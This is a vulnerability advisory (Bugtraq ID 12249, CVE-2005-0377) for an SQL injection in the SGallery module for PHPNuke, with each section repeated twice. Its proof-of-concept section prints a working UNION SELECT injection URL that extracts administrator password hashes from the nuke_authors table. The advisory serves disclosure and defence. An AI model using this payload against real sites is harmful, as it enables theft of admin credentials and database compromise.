SGallery Module For PHPNuke SQL Injection Vulnerability
BID:12249
Info
SGallery Module For PHPNuke SQL Injection Vulnerability
| Bugtraq ID: | 12249 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0377 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 12 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery is credited to Janek Vind <[email protected]>. |
| Vulnerable: |
SGallery SGallery 1.0 1 |
| Not Vulnerable: | |
Discussion
SGallery Module For PHPNuke SQL Injection Vulnerability
SGallery is reported prone to SQL injection attacks. An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information.
SGallery 1.01 is reported vulnerable to this issue.
SGallery is reported prone to SQL injection attacks. An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information.
SGallery 1.01 is reported vulnerable to this issue.
Exploit / POC
SGallery Module For PHPNuke SQL Injection Vulnerability
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/nuke75/modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/nuke75/modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1
Solution / Fix
SGallery Module For PHPNuke SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
SGallery Module For PHPNuke SQL Injection Vulnerability
References:
References:
- SGallery Product Page (SGallery)
- [waraxe-2005-SA#039] - Critical Sql Injection in Sgallery module for PhpNuke (Janek Vind
)